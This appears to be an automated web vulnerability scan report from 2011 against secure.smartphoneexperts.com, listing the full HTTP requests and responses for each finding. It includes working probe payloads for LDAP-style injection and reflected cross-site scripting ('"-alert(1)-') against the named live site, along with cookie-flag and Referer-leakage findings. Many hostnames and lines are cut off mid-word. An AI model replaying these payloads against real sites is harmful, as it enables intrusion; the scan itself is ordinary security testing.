2. Cross-site scripting (reflected)
3. SSL cookie without secure flag set
4. Cross-domain Referer leakage
4.1. https://secure.smartphoneexperts.com/
4.2. https://secure.smartphoneexperts.com/content/customercare/page-status.htm
5. Cookie without HttpOnly flag set
5.1. https://secure.smartphoneexperts.com/
5.2. https://secure.smartphoneexperts.com/content/customercare/page-status.htm
9. HTML does not specify charset
9.1. https://secure.smartphoneexperts.com/
9.2. https://secure.smartphoneexperts.com/content/customercare/page-status.htm
Severity: | High |
Confidence: | Tentative |
Host: | https://secure.smart |
Path: | /content/customercare |
POST /content/customercare/*)(sn=* HTTP/1.1 Host: secure.smartphoneexperts Connection: keep-alive Referer: https://secure.smart Cache-Control: max-age=0 Origin: https://secure.smart User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=2v4he5hjga Content-Length: 69 data_process=billing |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:10:58 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 64921 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... <span class='customer - Matthew, TX </span> </div> <div class='sidebar-fot'></div </div> </div> <!-- content END --> </div> <!-- container END --> </div> <!-- container-wrapper END --> </div> <!-- background END --> <div class='footer-wrapper'> <div class='footer'> <p>Copyright © 1999-2011 <a class='text_small' href='http://www <a class='text_small' href='http://store <a class='text_small' href='http://store <p><I>Android and the Android Logo are trademarks or registered trademarks of Google, Inc. in the United States and other countries.</p> </div> </div> </div> <!-- background-wrapper END --> <script type='text/javascript'> jQuery(function() { var url = window.location.href;url = url.substr(url.lastI if (url!='') $('.header-menu1').find( }); </script> <script type='text/javascript'> jQuery(function() { // Clue Tip $('a.tips').cluetip(); $('a.tips_cart:eq(0)') width:340 }); }); // Content Slider try { featuredcontentglider gliderid: 'fader', //ID of main glider container contentclass: 'fader-content', //Shared CSS class name of each glider content togglerid: 'fader-toggle', //ID of toggler container remotecontent: '', //Get gliding contents from external file on server? 'filename' or '' to disable selected: 0, //Default selected content index (0=1st) persiststate: false, //Remember last content shown within browser session (true/false)? speed: 500, //Glide animation duration (in milliseconds) autorotate: true, //Auto rotate contents (true/false)? autorotateconfig: [5000,500] //if auto rotate en ...[SNIP]... |
POST /content/customercare/*)!(sn=* HTTP/1.1 Host: secure.smartphoneexperts Connection: keep-alive Referer: https://secure.smart Cache-Control: max-age=0 Origin: https://secure.smart User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=2v4he5hjga Content-Length: 69 data_process=billing |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:10:58 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 64947 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... <span class='customer - Joseph, VA </span> </div> <div class='sidebar-fot'></div </div> </div> <!-- content END --> </div> <!-- container END --> </div> <!-- container-wrapper END --> </div> <!-- background END --> <div class='footer-wrapper'> <div class='footer'> <p>Copyright © 1999-2011 <a class='text_small' href='http://www <a class='text_small' href='http://store <a class='text_small' href='http://store <p><I>Android and the Android Logo are trademarks or registered trademarks of Google, Inc. in the United States and other countries.</p> </div> </div> </div> <!-- background-wrapper END --> <script type='text/javascript'> jQuery(function() { var url = window.location.href;url = url.substr(url.lastI if (url!='') $('.header-menu1').find( }); </script> <script type='text/javascript'> jQuery(function() { // Clue Tip $('a.tips').cluetip(); $('a.tips_cart:eq(0)') width:340 }); }); // Content Slider try { featuredcontentglider gliderid: 'fader', //ID of main glider container contentclass: 'fader-content', //Shared CSS class name of each glider content togglerid: 'fader-toggle', //ID of toggler container remotecontent: '', //Get gliding contents from external file on server? 'filename' or '' to disable selected: 0, //Default selected content index (0=1st) persiststate: false, //Remember last content shown within browser session (true/false)? speed: 500, //Glide animation duration (in milliseconds) autorotate: true, //Auto rotate contents (true/false)? autorotateconfig: [5000 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | /content/customercare |
GET /content/customercare725a7"-alert(1)- Host: secure.smartphoneexperts Connection: keep-alive Referer: https://secure.smart Cache-Control: max-age=0 Origin: https://secure.smart User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=2v4he5hjga |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:10:23 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 64865 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... evice) { setCookie('initializ location.href = "http://store.androi } } --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | /content/customercare |
GET /content/customercare6eabd"-alert(1)- Host: secure.smartphoneexperts Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:06:33 GMT Content-Type: text/html Connection: keep-alive Set-Cookie: store_id_secure=deleted; expires=Mon, 10-May-2010 14:06:31 GMT; path=/; secure; httponly Set-Cookie: store_id_secure=15; path=/; secure; httponly Set-Cookie: PHPSESSID=t9v2isfjo8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: visitor_id=57e98fb80 Set-Cookie: cookie_treo_model=deleted Set-Cookie: cookie_treo_model=1317; expires=Tue, 09-Apr-2013 14:06:32 GMT; path=/; httponly Set-Cookie: device_id_history=1317; path=/; httponly Content-Length: 64875 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... evice) { setCookie('initializ location.href = "http://store.androi } } --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | /content/customercare |
GET /content/customercare Host: secure.smartphoneexperts Connection: keep-alive Referer: https://secure.smart Cache-Control: max-age=0 Origin: https://secure.smart User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=2v4he5hjga |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:10:43 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Accel-Expires: 0 Content-Length: 23547 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... setCookie('initializ location.href = "http://store.androi } } --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | /content/customercare |
GET /content/customercare Host: secure.smartphoneexperts Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:07:02 GMT Content-Type: text/html Connection: keep-alive Set-Cookie: store_id_secure=deleted; expires=Mon, 10-May-2010 14:07:00 GMT; path=/; secure; httponly Set-Cookie: store_id_secure=15; path=/; secure; httponly Set-Cookie: PHPSESSID=ahuihimc4t Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: visitor_id=c68ad914b Set-Cookie: cookie_treo_model=deleted Set-Cookie: cookie_treo_model=1317; expires=Tue, 09-Apr-2013 14:07:01 GMT; path=/; httponly Set-Cookie: device_id_history=1317; path=/; httponly X-Accel-Expires: 0 Content-Length: 22642 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... setCookie('initializ location.href = "http://store.androi } } --> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://secure.smart |
Path: | /content/customercare |
GET /content/customercare Host: secure.smartphoneexperts Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:16 GMT Content-Type: text/html Connection: keep-alive Set-Cookie: store_id_secure=deleted; expires=Mon, 10-May-2010 14:04:15 GMT; path=/; secure; httponly Set-Cookie: store_id_secure=15; path=/; secure; httponly Set-Cookie: PHPSESSID=q6shm07j0a Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: visitor_id=ff8cacd05 Set-Cookie: cookie_treo_model=deleted Set-Cookie: cookie_treo_model=1317; expires=Tue, 09-Apr-2013 14:04:16 GMT; path=/; httponly Set-Cookie: device_id_history=1317; path=/; httponly X-Accel-Expires: 0 Content-Length: 22615 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | / |
GET /?e=R4UFxsR0C1UhyqbZ Host: secure.smartphoneexperts Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: store_id_secure=15; visitor_id=7bafa0a92 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:05:46 GMT Content-Type: text/html Connection: keep-alive Pragma: no-cache Cache-Control: no-cache,no-store, Expires: Sat, 14 Jun 2003 05:00:00 GMT X-Accel-Expires: 0 Set-Cookie: cookie_treo_model=deleted Set-Cookie: cookie_treo_model=1317; expires=Tue, 09-Apr-2013 14:05:46 GMT; path=/; secure; httponly Set-Cookie: visitor_id=839c627b9 Content-Length: 19693 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... <a href='javascript:pop_up( ...[SNIP]... <div style='display:none;'> <img src='//pixel.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | /content/customercare |
GET /content/customercare Host: secure.smartphoneexperts Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:16 GMT Content-Type: text/html Connection: keep-alive Set-Cookie: store_id_secure=deleted; expires=Mon, 10-May-2010 14:04:15 GMT; path=/; secure; httponly Set-Cookie: store_id_secure=15; path=/; secure; httponly Set-Cookie: PHPSESSID=q6shm07j0a Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: visitor_id=ff8cacd05 Set-Cookie: cookie_treo_model=deleted Set-Cookie: cookie_treo_model=1317; expires=Tue, 09-Apr-2013 14:04:16 GMT; path=/; httponly Set-Cookie: device_id_history=1317; path=/; httponly X-Accel-Expires: 0 Content-Length: 22615 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... <a href='javascript:pop_up( ...[SNIP]... <div style='display:none;'> <img src='//pixel.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | / |
GET /?e=R4UFxsR0C1UhyqbZ Host: secure.smartphoneexperts Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: store_id_secure=15; visitor_id=7bafa0a92 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:05:46 GMT Content-Type: text/html Connection: keep-alive Pragma: no-cache Cache-Control: no-cache,no-store, Expires: Sat, 14 Jun 2003 05:00:00 GMT X-Accel-Expires: 0 Set-Cookie: cookie_treo_model=deleted Set-Cookie: cookie_treo_model=1317; expires=Tue, 09-Apr-2013 14:05:46 GMT; path=/; secure; httponly Set-Cookie: visitor_id=839c627b9 Content-Length: 19693 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | /content/customercare |
GET /content/customercare Host: secure.smartphoneexperts Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:16 GMT Content-Type: text/html Connection: keep-alive Set-Cookie: store_id_secure=deleted; expires=Mon, 10-May-2010 14:04:15 GMT; path=/; secure; httponly Set-Cookie: store_id_secure=15; path=/; secure; httponly Set-Cookie: PHPSESSID=q6shm07j0a Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: visitor_id=ff8cacd05 Set-Cookie: cookie_treo_model=deleted Set-Cookie: cookie_treo_model=1317; expires=Tue, 09-Apr-2013 14:04:16 GMT; path=/; httponly Set-Cookie: device_id_history=1317; path=/; httponly X-Accel-Expires: 0 Content-Length: 22615 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | /javascripts/spe-v3.js |
GET /javascripts/spe-v3.js HTTP/1.1 Host: secure.smartphoneexperts Connection: keep-alive Referer: https://secure.smart User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: store_id_secure=15; visitor_id=7bafa0a92 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:03:36 GMT Content-Type: application/x-javascript Last-Modified: Wed, 13 Apr 2011 05:02:57 GMT Connection: keep-alive Content-Length: 176268 /************************ Name: Highslide JS Version: 4.1.2 (March 27 2009) Config: default +events +unobtrusive +imagemap +slideshow +posi ...[SNIP]... <brian@cherne.net> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | /content/customercare |
GET /robots.txt HTTP/1.0 Host: secure.smartphoneexperts |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:18 GMT Content-Type: text/plain Connection: close User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | /javascripts/highslide412 |
GET /javascripts/highslide412 Host: secure.smartphoneexperts Connection: keep-alive Referer: https://secure.smart User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: store_id_secure=15; visitor_id=7bafa0a92 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:17 GMT Content-Type: application/octet-stream Content-Length: 326 Last-Modified: Fri, 15 Apr 2011 02:02:33 GMT Connection: keep-alive Accept-Ranges: bytes ...... ......0.......(... ...@..................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | / |
GET /?e=R4UFxsR0C1UhyqbZ Host: secure.smartphoneexperts Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: store_id_secure=15; visitor_id=7bafa0a92 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:05:46 GMT Content-Type: text/html Connection: keep-alive Pragma: no-cache Cache-Control: no-cache,no-store, Expires: Sat, 14 Jun 2003 05:00:00 GMT X-Accel-Expires: 0 Set-Cookie: cookie_treo_model=deleted Set-Cookie: cookie_treo_model=1317; expires=Tue, 09-Apr-2013 14:05:46 GMT; path=/; secure; httponly Set-Cookie: visitor_id=839c627b9 Content-Length: 19693 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | /content/customercare |
GET /content/customercare Host: secure.smartphoneexperts Connection: keep-alive Referer: http://store.android User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 14:04:16 GMT Content-Type: text/html Connection: keep-alive Set-Cookie: store_id_secure=deleted; expires=Mon, 10-May-2010 14:04:15 GMT; path=/; secure; httponly Set-Cookie: store_id_secure=15; path=/; secure; httponly Set-Cookie: PHPSESSID=q6shm07j0a Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: visitor_id=ff8cacd05 Set-Cookie: cookie_treo_model=deleted Set-Cookie: cookie_treo_model=1317; expires=Tue, 09-Apr-2013 14:04:16 GMT; path=/; httponly Set-Cookie: device_id_history=1317; path=/; httponly X-Accel-Expires: 0 Content-Length: 22615 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | /content/customercar |
GET /content/customercar Host: secure.smartphoneexperts User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://secure.smart Cookie: PHPSESSID=t9v2isfjo8 |
HTTP/1.1 200 OK Server: spe Date: Tue, 10 May 2011 17:52:56 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 64991 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns='http://www.w3.org <head> <ti ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.smart |
Path: | / |
Issued to: | secure.smartphoneexperts.com |
Issued by: | VeriSign Class 3 Extended Validation SSL CA |
Valid from: | Mon Jun 01 19:00:00 CDT 2009 |
Valid to: | Sat Jul 02 18:59:59 CDT 2011 |
Issued to: | VeriSign Class 3 Extended Validation SSL CA |
Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Valid from: | Tue Nov 07 18:00:00 CST 2006 |
Valid to: | Mon Nov 07 17:59:59 CST 2016 |
Issued to: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Issued by: | VeriSign Class 3 Public Primary Certification Authority - G5 |
Valid from: | Tue Nov 07 18:00:00 CST 2006 |
Valid to: | Wed Jul 16 18:59:59 CDT 2036 |